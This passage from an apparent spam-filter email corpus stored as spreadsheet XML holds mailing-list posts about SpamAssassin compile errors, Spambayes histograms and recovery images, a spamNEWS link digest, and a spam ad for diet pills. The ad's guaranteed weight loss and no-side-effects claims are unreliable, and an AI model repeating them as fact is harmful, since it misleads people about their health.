 &gt; 
 -- 
 Mail sent on Mandkrake 8.2 ext3 k2419 AMD 1.4
 "Piece by Piece, the penguins are taking my sanity apart ..."
 http://frlinux.net - frlinux@frlinux.net
 http://gentoofr.org - Portail Francais sur Gentoo Linux
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Compile error under Digital Unix
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I'm trying to build SA under Digital Unix 4.0f and am receiving a
 compile error (and many warnings) for spamc.  The "perl Makefile.PL"
 does OK, but when I do the make, I get this:
 cc -std -fprm d -ieee -D_INTRINSICS -I/usr/local/include -DLANGUAGE_C
 -O4 spamd
 /spamc.c  -o spamd/spamc -L/usr/local/lib -lbind -ldbm -ldb -lm -liconv
 -lutil
 cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has
 no linka
 ge and has a prior declaration in this scope at line number 592 in file
 /usr/inc
 lude/sys/types.h. (nolinkage)
 typedef unsigned long   in_addr_t;      /* base type for internet
 address */
 ------------------------^
 cc: Warning: spamd/spamc.c, line 169: In this statement, the referenced
 type of
 the pointer value "msg_buf" is "char", which is not compatible with
 "unsigned ch
 ar". (ptrmismatch)
   if((bytes = full_read (in, msg_buf, max_size+1024, max_size+1024)) &gt;
 max_size)
 -----------------------------^
 cc: Warning: spamd/spamc.c, line 174: In this statement, the referenced
 type of
 the pointer value "header_buf" is "char", which is not compatible with
 "const un
 signed char". (ptrmismatch)
     full_write (out,header_buf,bytes2);
 --------------------^
 cc: Warning: spamd/spamc.c, line 202: In this statement, the referenced
 type of
 the pointer value "header_buf" is "char", which is not compatible with
 "const un
 signed char". (ptrmismatch)
     full_write (out,header_buf,bytes2);
 --------------------^
 cc: Warning: spamd/spamc.c, line 203: In this statement, the referenced
 type of
 the pointer value "msg_buf" is "char", which is not compatible with
 "const unsig
 ned char". (ptrmismatch)
     full_write (out,msg_buf,bytes);
 --------------------^
 cc: Warning: spamd/spamc.c, line 306: In this statement, the referenced
 type of
 the pointer value "buf" is "char", which is not compatible with
 "unsigned char".
  (ptrmismatch)
           if(full_read (in,buf,2,2) != 2 || !('\r' == buf[0] &amp;&amp; '\n' ==
 buf[1]))
 ---------------------------^
 cc: Warning: spamd/spamc.c, line 321: In this statement, the referenced
 type of
 the pointer value "buf" is "char", which is not compatible with
 "unsigned char".
  (ptrmismatch)
     while((bytes=full_read (in,buf,8192, 8192)) &gt; 0)
 -------------------------------^
 cc: Warning: spamd/spamc.c, line 348: In this statement, the referenced
 type of
 the pointer value "out_buf" is "char", which is not compatible with
 "const unsig
 ned char". (ptrmismatch)
       full_write (out, out_buf, out_index);
 -----------------------^
 cc: Warning: spamd/spamc.c, line 497: In this statement, the referenced
 type of
 the pointer value "msg_buf" is "char", which is not compatible with
 "const unsig
 ned char". (ptrmismatch)
       full_write (STDOUT_FILENO,msg_buf,amount_read);
 --------------------------------^
 cc: Warning: spamd/spamc.c, line 512: In this statement, the referenced
 type of
 the pointer value "msg_buf" is "char", which is not compatible with
 "const unsig
 ned char". (ptrmismatch)
       full_write(STDOUT_FILENO,msg_buf,amount_read);
 -------------------------------^
 *** Exit 1
 Stop.
 Can anyone suggest a way to get around this?   TIA...
 Jim McCullars
 The University of Alabama in Huntsville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</si>
  <si>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Re: use of base image / delta image for automated recovery from
</t>
  </si>
  <si>
    <t xml:space="preserve">reply to the mail from Ben Mord (bmord@icon-nicholson.com):
 &gt; Hi,
 Hello,
 &lt; ... snipped for brevity ... &gt;
 &gt; ... This concept could also be
 &gt; applied to the application servers, and even the database server partitions
 &gt; (except for those partitions which contain the table data files, of course.)
 	Although the data might just be the information that needs protecting.
 &gt; Does anyone do this already? Or is this a new concept?
 	I've seen this implemented for a shell server, although they chose
 to have their root on a CD-WR in a CD-R drive. Which meant that even
 when compromised it was only possible to examine other users data.
 	AFAIR(emember) they just swapped CD's when a root exploit was found.
 &gt; Thanks for any opinions,
 NP
 blaze your trail
 --
 redhat
 'I am become Shiva, destroyer of worlds'
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MEDIA: spamNEWS Digest September 30 - October 05, 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">spamNEWS: Providing the news about junk E-mail to Internet professionals        
 ______________________________________________________________________________
 This is a weekly digest form of spamNEWS, posted to USENET and spam-oriented mailing lists. For the complete, DAILY VERSION of spamNEWS, including a weekly calendar of email-related events and conferences, free confirmed opt-in subscriptions are available at http://survey.whitehat.com/survey.php?s=2650
 ________________________________________________________________________________
 Did we miss something? Know of a hot story? Send leads to: http://survey.whitehat.com/predirect.php?c=6688
 ________________________________________________________________________________
 spamNEWS DATABASE @ SPAMCON.org http://survey.whitehat.com/predirect.php?c=6689
 ________________________________________________________________________________
 spamNEWS is sponsored by POSTINI http://survey.whitehat.com/predirect.php?c=6687
 ________________________________________________________________________________
 SPAM FILTERING TECHNIQUES - IBM developerWorks 9/1/2002 &lt;http://click.wh5.com/redirect.php?c=8552&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 HELP ON THE WAY IN SPAM WARS - internet.com 9/17/2002 &lt;http://click.wh5.com/redirect.php?c=8556&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 ACTIVESTATE RELEASES PERLMX 2.1 - Canada IT 9/18/2002 &lt;http://click.wh5.com/redirect.php?c=8551&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 SPAM: E-MARKETING'S ALTER EGO - CRM 9/19/2002 &lt;http://click.wh5.com/redirect.php?c=8560&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 NEW WEAPON IN THE WAR AGAINST SPAM: CATS - Seattle Times 9/21/2002 &lt;http://click.wh5.com/redirect.php?c=8548&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 FOCUSED APPS EASE E-MAIL OVERLOAD - eWEEK 9/23/2002 &lt;http://click.wh5.com/redirect.php?c=8498&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 MARKETERS USE TRICKS TO SPAM YOU - News Channel 8 9/25/2002 &lt;http://click.wh5.com/redirect.php?c=8547&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 NEEDED NOW: LAWS TO CAN SPAM - Business Week 9/26/2002 &lt;http://click.wh5.com/redirect.php?c=8508&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 BEWARE OF SECONDHAND SPAMMING - DM News 9/26/2002 &lt;http://click.wh5.com/redirect.php?c=8542&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 WILL E-MAIL KILL WALL STREET? - Forbes 9/26/2002 &lt;http://click.wh5.com/redirect.php?c=8501&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 CALIFORNIA SUES MARKETING FIRM FOR SPAMMING - Mercury News 9/26/2002 &lt;http://click.wh5.com/redirect.php?c=8503&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 U DECLARES WAR ON SPAM E-MAIL; FILTERS TO DEBUT - Minnesota Daily 9/26/2002 &lt;http://click.wh5.com/redirect.php?c=8546&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 ONLINE PAYMENT SERVICE PAYPAL HIT BY SCAM - Computer World 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8486&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 AMAZON TO TUNE PRIVACY POLICY - E-Commerce Times 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8509&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 WHAT DO YOU USE TO BATTLE SPAM? - eWEEK 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8496&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 SPAM, AND WHAT YOU CAN DO ABOUT IT - INT Media Group 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8489&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 UNIVERSITY TAKES AIM AT CAMPUS SPAM - Internet Broadcasting Systems 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8555&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 STUDY: E-MAIL TO DOUBLE BY 2006 - internetnews.com 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8497&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 GOOD NEWS ON PRIVACY - Nando Media 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8510&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 SPAM-BUSTER BRIGHTMAIL DELIVERS - San Francisco Business Journals 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8543&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 THE FUTILE FIGHT AGAINST SPAM - St. Petersburg Times 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8507&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 VIRUSES ARE DEAD. LONG LIVE VIRUSES! - The Register 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8511&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 EMAIL REMOVER 3.0 - VNU 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8495&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 ANTI-SPAM LAWS A TOUGH 'CELL' - Wired 9/27/2002 &lt;http://click.wh5.com/redirect.php?c=8500&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 LONG ARM OF THE LAW STRETCHES - News.com AU 9/28/2002 &lt;http://click.wh5.com/redirect.php?c=8499&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 SPAM - Boston Globe 9/29/2002 &lt;http://click.wh5.com/redirect.php?c=8506&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 FIGHT BACK AGAINST E-MAIL SPAM - Calgary Herald 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8545&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 ADVERTISING BY E-MAIL -- WITHOUT RAISING HACKLES! - eMail Results 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8529&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 TOWARD OPTIMAL CYBERSPACE SECURITY - eWEEK 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8601&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 TIME TO CAN THE SPAM - Federal Computer Week 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8531&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 ANTI-SPAM CULTURE HELPED SPAWN LIST THEFT - iMarketing News 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8504&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 SPAM BUSTERS - Independent Digital 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8550&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 HOLD THE SPAM - Information Week 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8523&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 SMS SPAM PROBLEM STARTS TO SNOWBALL - Inquirer 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8553&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 STATE PROSECUTORS TRYING TO DELETE SPAM - Los Angeles Times 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8524&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 KILL THAT SPAM! - Mercury News 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8505&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 NEW 'BUGBEAR' BITES NET USERS - MSNBC
 9/30/2 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8533&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 THE LAST MILE - Network Computing 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8519&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 TIRED OF SPAM? - New York Times Service 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8554&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 CALEO &amp; EMERIS ON EMAIL QUEST - Opt-in News 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8487&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 EUNIVERSE ACQUIRES RESPONSEBASE - Opt-in News 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8488&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 ECLEANER V2.01 - PC World 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8516&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 SPAM OPPONENTS TURN TO LAWSUITS TO STOP JUNK E-MAIL - Reuters 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8525&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 EU MULLS DATA PRIVACY LAW REVIEW - Reuters 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8526&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 VODAFONE IRELAND FACES SKI SPAM ALLEGATIONS - The Register 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8520&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 YOU HAVE MAIL: 31 BILLION A DAY - VNU 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8518&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 MARYLAND LAW TARGETS SPAMMERS - Washington Times 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8514&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 PORN SPAM: IT'S GETTING RAUNCHIER - Wired 9/30/2002 &lt;http://click.wh5.com/redirect.php?c=8521&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 CITING NON-EXISTENT LAW, JUDGE RULES AGAINST SPAM VICTIM - AboutSpam.com 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8534&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 AOL TO DELIVER ABDUCTED-CHILDREN ALERTS TO ITS 26M MEMBERS - Associated Press 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8540&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 SURESH RAMASUBRAMANIAN: ANTI-SPAM MAN - Business Week 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8513&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 WE TRIED EMAIL -- IT DIDN'T WORK - ClickZ 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8527&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 INTERVIEW WITH SURESH RAMASUBRAMANIAN: OUTBLAZE ANTI-SPAM MAN - CNN 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8583&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 INTERNET EMAIL ADDRESSES - Computer Bits 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8528&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 COMPUTER CURMUGEON - Computer Bits 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8530&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 CALIFORNIA POLS WANT TO BAN CELL PHONE SPAM - DIRECT Newsline 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8559&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 BIG PUSH FROM IBM ON LOTUS APPS - Information Week 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8549&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 IBM'S NOTES UPGRADES FOCUS ON COLLABORATION, COSTS, STOPPING SPAM - InternetWeek 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8535&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 EMAIL MARKETER SEARCHES FOR PARTNER - Opt-in News 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8515&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 HOW SECURE IS INSTANT MESSAGING? - PC World 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8532&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 DON'T REACH OUT AND TOUCH THIS SOMEONE, ESPECIALLY AT DINNERTIME - Scripps-McClatchy Western Service 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8600&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 NOIE SPAM REVIEW GETS 32 SUBMISSIONS - The Age 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8522&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 DEAR SPAM, GLAD YOU'RE NOT HERE ... - The Age 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8517&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 FIGHTING SPAM AS AN INDIVIDUAL USER - Yomiuri Shimbun 10/1/2002 &lt;http://click.wh5.com/redirect.php?c=8544&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 COMPANIES THAT SOLD STUDENT DATA SETTLE FEDERAL CHARGES - Associated Press 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8557&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 OH, THAT DOCTORATE IN BUSINESS ADMINISTRATION - Australian IT 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8539&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 INTERNET PIONEER DAVE RAND JOINS PEER 1 NETWORK BOARD OF DIRECTORS - Canadian Corporate News 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8584&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 COMBATING SPAM - CBS Marketwatch 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8590&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 FAINT POLITICAL VOICES RISE FROM E-MAIL - CNET News.com 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8558&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 YAHOO MARKETING ANGERS STORE OWNERS - CNET News.com 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8561&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 FBI NAMES MOST WANTED SECURITY FLAWS - CNET News.com 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8602&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 LISTS LIVE ON AFTER COMPANY IS GONE - DM News 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8541&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 COMMUNICATIONS SURVEILLANCE - Email 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8562&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 BUGBEAR VIRUS STILL RUNNING WILD - eWeek 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8603&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 TANATOS - A WORM WITH A "TROJAN" IN ITS POCKET - INB 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8563&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 WAYS TO PUT YOUR COMPUTER ON A SPAM-FREE DIET - SuburbanChicagoNews 10/2/2002 &lt;http://click.wh5.com/redirect.php?c=8592&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 PIONEERS IN THE EMAIL HIGHLANDS - ClickZ 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8596&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 OUTLOOK, EXCHANGE TO GET NEW FEATURES - CNET News.com 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8586&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 JUDGE ORDERS FCC TO STOP PURSUIT OF FAX.COM - DM News 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8594&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 INFORMATION INUNDATION - INT Media Group 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8597&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 READER REVIEW: HOW I USE OPEN-SOURCE TOOLS TO STUNT SPAM - InternetWeek 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8587&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 OUR VIEWS: FTC SHOULD CURB SPAM AVALANCHE - Los Angeles Times 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8599&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 SPAMFIRE FILTERS OUT A JAGUAR UPDATE - Mac Observer 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8588&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 FILTERING TOOLS OFFER HOPE AGAINST SPAM ONSLAUGHT - Mike Langberg 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8591&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 EMAIL MARKETING TUNE-UP GUIDE - Opt-in News 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8598&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 KINDER SHIELD LABS INTRODUCES CHILD SAFE EMAIL SOFTWARE - PR Newswire 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8589&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 NIGERIAN EMAIL SCAM BROKEN UP - Sydney Morning Herald 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8582&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 CALIFORNIANS SEEK SPAM SHELTER - Wired 10/3/2002 &lt;http://click.wh5.com/redirect.php?c=8595&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 PSYCHIC NETWORK EXECS PLEAD GUILTY, MISS CLEO HEADS FOR HEARING - DM News 10/4/2002 &lt;http://click.wh5.com/redirect.php?c=8593&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 APPLE NETWORKING TAKES A GIANT LEAP WITH JAGUAR - Wall Street Journal 10/4/2002 &lt;http://click.wh5.com/redirect.php?c=8585&amp;u=lXoyuP..CahrNet_0bkttg&gt;
 HABEAS NAMES SPAM AUTHORITY TO HEAD PRODUCT MARKETING - Press Release 10/3/2002 &lt;http://library.northernlight.com/FB20021003550000020.html?cb=200&amp;dx=1006&amp;sc=0#doc&gt;
 ________________________________________________________________________________
 spamNEWS is sponsored by POSTINI http://survey.whitehat.com/predirect.php?c=6687
 ________________________________________________________________________________
 spamNEWS is published by Pete Moss Publications, Montreal, Canada.
 spamNEWS is a trademark of Pete Moss Publications. ISSN 1499-075X
 Compilation copyright 2002 by Neil Schwartzman, all rights reserved.
 All stories are the copyright of the individual authors and publishers cited.
 spamNEWS in any of its forms (web, e-mail, archive) is intended to enhance and provide information. No claim is made as to the accuracy or authenticity of the material provided here. Pete Moss Publications neither extends nor assumes any liability with regard to the information quoted herein.
 All broadcast, publication, re-transmission to e-mail lists, the WWW or any other copying or storage, in any medium, on-line or not, must include this section and no fee may be charged for access to this compilation.
 --------------------------------------------------------------------------
 spamNEWS is powered by Whitehat http://survey.whitehat.com/predirect.php?c=6695
 --------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Truck driver leaves trail of smelly pizza waste along major
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8402896,1717/
 Date: 2002-09-30T18:17:08+01:00
 (charlotte.com)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] Current histograms
</t>
  </si>
  <si>
    <t xml:space="preserve">[Anthony Baxter]
 &gt; Well, I've finally got around to pulling down the SF code. Starting
 &gt; with it, and absolutely zero local modifications, I see the following:
 How many runs is this summarizing?  For each, how many ham&amp;spam were in the
 training set?  How many in the prediction sets?  What were the error rates
 (run rates.py over your output file)?
 The effect of set sizes on accuracy rates isn't known.  I've informally
 reported some results from just a few controlled experiments on that.
 Jeremy reported improved accuracy by doubling the training set size, but
 that wasn't a controlled experiment (things besides just training set size
 changed between "before" and "after").
 &gt; Ham distribution for all runs:
 &gt; * = 589 items
 &gt;   0.00 35292 ************************************************************
 &gt;   2.50    36 *
 &gt;   5.00    21 *
 &gt;   7.50    12 *
 &gt;  10.00     6 *
 &gt; ...
 &gt;  90.00     4 *
 &gt;  92.50     8 *
 &gt;  95.00    15 *
 &gt;  97.50   441 *
 &gt;
 &gt; Spam distribution for all runs:
 &gt; * = 504 items
 &gt;   0.00   393 *
 &gt;   2.50    17 *
 &gt;   5.00    18 *
 &gt;   7.50    12 *
 &gt;  10.00     4 *
 &gt; ...
 &gt;  90.00    11 *
 &gt;  92.50    16 *
 &gt;  95.00    45 *
 &gt;  97.50 30226 ************************************************************
 &gt;
 &gt;
 &gt; My next (current) task is to complete the corpus I've got - it's currently
 &gt; got ~ 9000 ham, 7800 spam, and about 9200 currently unsorted. I'm tossing
 &gt; up using either hammie or spamassassin to do the initial sort  -
 previously
 &gt; I've used various forms of 'grep' for keywords and a little gui thing to
 &gt; pop a message up and let me say 'spam/ham', but that's just getting too,
 too
 &gt; tedious.
 Yup, tagging data is mondo tedious, and mistakes hurt.
 I expect hammie will do a much better job on this already than hand
 grepping.  Be sure to stare at the false positives and get the spam out of
 there.
 &gt; I can't make it available en masse, but I will look at finding some of
 &gt; the more 'interesting' uglies. One thing I've seen (consider this
 &gt; 'anecdotal' for now) is that the 'skip' tokens end up in a _lot_ of the
 &gt; f-ps.
 With probabilities favoring ham or spam?  A skip token is produced in lieu
 of "word" more than 12 chars long and without any high-bit characters.  It's
 possible that they helped me because raw HTML produces lots of these.
 However, if you're running current CVS, Tokenizer/retain_pure_html_tags
 defaults to False now, so HTML decorations should vanish before body
 tokenization.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Improved Fat Burners, Now With TV Fat Absorbers! Time:6:25:49 PM
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;center&gt;
 &lt;b&gt;
 &lt;font color="blue"&gt;
 *****Bonus Fat Absorbers As Seen On TV, Included Free With Purchase Of 2 Or More Bottle, $24.95 Value*****
 &lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 ***TAKE $10.00 OFF 2 &amp; 3 MONTH SUPPLY ORDERS, $5.00 OFF 1 MONTH SUPPLY!
 ***AND STILL GET YOUR BONUS!  PRICE WILL BE DEDUCTED DURING PROCESSING.
 &lt;br&gt;
 &lt;br&gt;
 ***FAT ABSORBERS ARE GREAT FOR THOSE WHO WANT TO LOSE WEIGHT,  BUT CAN'T STAY ON A DIET***
 &lt;br&gt;
 &lt;br&gt;
 ***OFFER GOOD UNTIL MAY 27, 2002!  FOREIGN ORDERS INCLUDED!
 &lt;br&gt;
 &lt;br&gt;
 &lt;font color="blue"&gt;
 LOSE 30 POUNDS  IN 30 DAYS... GUARANTEED!!!
 &lt;br&gt;
 &lt;br&gt;
 All Natural Weight-Loss Program, Speeds Up The Metabolism Safely
 Rated #1 In Both Categories of SAFETY &amp; EFFECTIVENESS In&lt;br&gt;
 (THE United States Today)
 &lt;br&gt;&lt;br&gt;
 WE'LL HELP YOU GET THINNER!
 WE'RE GOING TO HELP YOU LOOK GOOD, FEEL GOOD AND TAKE CONTROL IN
 2002
 &lt;br&gt;
 &lt;br&gt;
 &lt;/b&gt;
 &lt;/font color="blue"&gt;
 &lt;/center&gt;
 Why Use Our Amazing Weight Loss Capsules?
 &lt;br&gt;&lt;br&gt;
 *  They act like a natural magnet to attract fat.&lt;br&gt;
 *  Stimulates the body's natural metabolism. &lt;br&gt;
 *  Controls appetite naturally and makes it easier to
    eat the right foods consistently.&lt;br&gt;
 *  Reduces craving for sweets.&lt;br&gt;
 *  Aids in the absorption of fat and in overall digestion.&lt;br&gt;
 *  Inhibits bad cholesterol and boosts good cholesterol.&lt;br&gt;
 *  Aids in the process of weight loss and long-term weight management.&lt;br&gt;
 *  Completely safe, UltraTrim New Century contains no banned
    substances and has no known side effects.&lt;br&gt;
 &lt;br&gt;
 What Makes UltraTrim New Century Unique?
 &lt;br&gt;&lt;br&gt;
 A scientifically designed combination of natural ingredients that
 provide long-term weight management in a safe and effective manner.
 &lt;br&gt;&lt;br&gt;
 *****&lt;br&gt;
 Receive A Bonus Supply Of Ultra Trim New Century &amp; A Bottle Of Fat Absorbers Listed Above, 
 With Every Order Of 2 Or More Bottles. Offer Good Until May. 27, 2002! &lt;br&gt;
 *****
 &lt;br&gt;&lt;br&gt;
 WE GLADLY SHIP TO ALL FOREIGN COUNTRIES! 
 &lt;br&gt;&lt;br&gt;
 You will be losing by tomorrow!  Don't Wait, visit our web
 page below, and order now!
 &lt;br&gt;&lt;br&gt;
 Email Address:   &lt;a
 href="mailto:ultratrimnow2001@aol.com"&gt;ultratrimnow2001@aol.com&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 Order by 24 Hour Fax!!!  775-257-6657.&lt;br&gt;
 &lt;br&gt;
 *****************&lt;br&gt;
 &lt;a
 href="http://www.geocities.com/ultra_weightloss_2002/"&gt;http://www.geocities.com/ultra_weightloss_2002/&lt;/a&gt;&lt;br&gt;
 *****************
 &lt;br&gt;&lt;br&gt;
 This is the easiest, fastest, and most effective way to lose both
 pounds and inches permanently!!!  This weight loss program is
 designed specifically to "boost" weight-loss efforts by assisting
 body metabolism, and helping the body's ability to manage weight.
 A powerful, safe, 30 Day Program.  This is one program you won't
 feel starved on.  Complete program for one amazing low price!
 Program includes: &lt;b&gt;BONUS AMAZING FAT ABSORBER CAPSULES, 30 DAY -
 WEIGHT
 REDUCTION PLAN, PROGRESS REPORT!&lt;/b&gt;
 &lt;br&gt;&lt;br&gt;
 SPECIAL BONUS..."FAT ABSORBERS", AS SEEN ON TV
 With every order...AMAZING MELT AWAY FAT ABSORBER CAPSULES with
 directions ( Absolutely Free ) ...With these capsules
 you can eat what you enjoy, without the worry of fat in your diet.
 2 to 3 capsules 15 minutes before eating or snack, and the fat will be
 absorbed and passed through the body without the digestion of fat into
 the body. 
 &lt;br&gt;&lt;br&gt;
 You will be losing by tomorrow!  Don't Wait, visit our web
